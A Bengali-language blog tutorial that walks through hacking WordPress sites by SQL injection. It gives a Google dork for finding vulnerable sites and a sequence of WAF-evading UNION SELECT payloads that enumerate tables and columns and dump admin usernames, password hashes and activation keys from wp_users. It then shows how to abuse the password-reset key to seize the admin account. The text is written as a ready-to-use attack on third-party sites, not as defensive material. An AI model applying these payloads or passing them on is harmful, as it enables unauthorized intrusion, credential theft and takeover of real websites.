আসসালামু আলাইকুম !
আপনারা অনেকেই এসকিউএল ইঞ্জেকশন নিয়ে কাজ করেছেন বা শুনেছেন , আজ আপনাদের আমি এসকিউএল ইঞ্জেকশন দিয়ে ওয়ার্ডপ্রেস হ্যাক এর ১ টি পদ্ধতি দেখাব ।
আজ আমি যেই টিউনটা করব তা হল এসকিউএল ইঞ্জেকশন দিয়ে কিভাবে পাসওয়ার্ড রিসেট করে ওয়ার্ডপ্রেস সাইট হ্যাক করা যায়!
এক্ষেত্রে যা লাগবে!
১। টিউন টা পরার মত ধৈর্য ।
২। এসকিউএল ইঞ্জেকশন সম্পর্কে ধারনা ।
প্রথমত আপনাকে গুগল এ ডরক ব্যবহার করে এসকিউএল এ ভুলনারেবল সাইট খুজতে হবে । যেমন –
inurl:”/related_posts_exit_popup_window.php”
তারপর যে কোন সাইট নেন এবং এসকিউএল ইঞ্জেকশন শুরু করুন !
১ম এ order by দিয়ে কলাম নাম্বার বের করুন !
www.site.com/wp-content/gallery.vid=7+order+by+1– no error
www.site.com/wp-content/gallery.vid=7+order+by+2– no error
www.site.com/wp-content/gallery.vid=7+order+by+3– no error
www.site.com/wp-content/gallery.vid=7+order+by+4– no error
www.site.com/wp-content/gallery.vid=7+order+by+5– no error
www.site.com/wp-content/gallery.vid=7+order+by+6– error
মানে কলাম নাম্বার ৫ !!
যারা ফায়ারওয়াল বাইপাস পারেন তারা ভুলনারেবল স্ট্রিং কলাম বের করতে লেখুনঃ
www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5–
এখন অনেক গুলা নাম্বার আসবে যেমন ২,৩ ইত্যাদি । যেকোনো ১তা নাম্বার সিলেক্ট করুন ! এক্ষেত্রে আমি নাম্বার ২ নিলাম! এখন ভারশন বের করতে লিখুন-
www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5–
ভারশন ৫ আসলে ভাল ! বেশি হলে ও সমস্যা নাই! এখন টেবিল নাম বের করি !
www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3,4,5+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()–
ফায়ারওয়াল বাইপাস এর সমস্যা হল যে টেবিল আলাদা ভাবে বের করতে হয় !
পরের টেবিল পেতে =database() এর পর লিখুন limit 1,1– তারপর limit 2,1– এভাবে যতক্ষণ না users অথবা admin টেবিল পাবেন ততক্ষণ খুঁজেন । ধরুন আমি limit 7,1– এ wp_users টেবিল পাইছি!
এখন কলাম বের করব! তাহলে লেখি-
www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3,4,5+/*!50000from*/+information_schema./**/+columns+where+table_name=CHAR(119, 112, 95, 117, 115, 101, 114, 115)–
লক্ষ করেন CHAR(119, 112, 95, 117, 115, 101, 114, 115) এটা হল wp_users টেবিল এর CHAR !
Mozilla ব্রাউজার এ Hackbar addon ইন্সটল করে নিয়ে SQL>MySQL>MySQL CHAR() এই অপশন এ গিয়ে wp_users টেবিল এর CHAR বের করুন।
কলাম বের করতে ও শেষে limit 1,1– তারপর limit 2,1– এভাবে দিতে হবে যতক্ষণ না user_login ও user_pass এবং user_activation_key কলাম পাওয়া যায় ।
এগুলা পাওয়া গেলে username,password,activation key পেতে লিখুনঃ
www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(user_login,0x3a,user_pass,0x3a,user_activation_key))),3,4,5+/*!50000from*/+wp_users–
এরপর username,password পেলে ও দেখবেন user_activation_key আশে নাই!
ধরেন সাইটেরঃ
username- admin1
password- $d$s4d5sNd2R16da.s4dA
ওয়ার্ডপ্রেস সাইটের password ক্রাক করা যায়না।
____এখন হল password রিসেট করার পালা :D
প্রথমে নতুন ট্যাব খুলে সাইটের admin panel এ যাই। উল্লেখ্য, সব ওয়ার্ডপ্রেস সাইটের admin panel হল —
www.site.com/wp-login.php
অর্থাৎ সাইটের পরে /wp-login.php দিলে ই admin panel পাওয়া যাবে :) । এখন
lost password এ ক্লিক করেন ।
দেখবেন username অথবা email চাইবে আপনার বের করা username (admin1)
দিয়ে দেন। তারপর লিঙ্ক টা লক্ষ করে দেখুন-
www.site.com/wp-login.php?checkmail=confirm
এই টাইপ কিছু আসছে নাকি । আসলে কাজ হইসে :D । এখন আপনার username,password ও user_activation_key পাওয়া ওই লিঙ্ক টা রিলোড করেন!
দেখেন আগে যেখানে user_activation_key ছিল না অখানে key আসছে! এরকম-
SdfgFgkjY13yY23
এবার admin panel এর লিঙ্ক এ যেয়ে লিখুন –
www.site.com/wp-login.php?action=rp&key=SdfgFgkjY13yY23&login=admin1
অর্থাৎ আমরা শেষে www.site.com/wp-login.php এর পর ?action=rp&key=SdfgFgkjY13yY23&login=admin1 যোগ করেছি !
এখন এনটার চাপ দিন ! দেখুন password চেঞ্জ করার অপশন আসছে! :D :D :D এবার password চেঞ্জ করে লগিন করুন :) !
হ্যাপি হ্যাকিং :) । কোন প্রকার সমস্যা হলে কমেন্ট করে জানাতে পারেন :)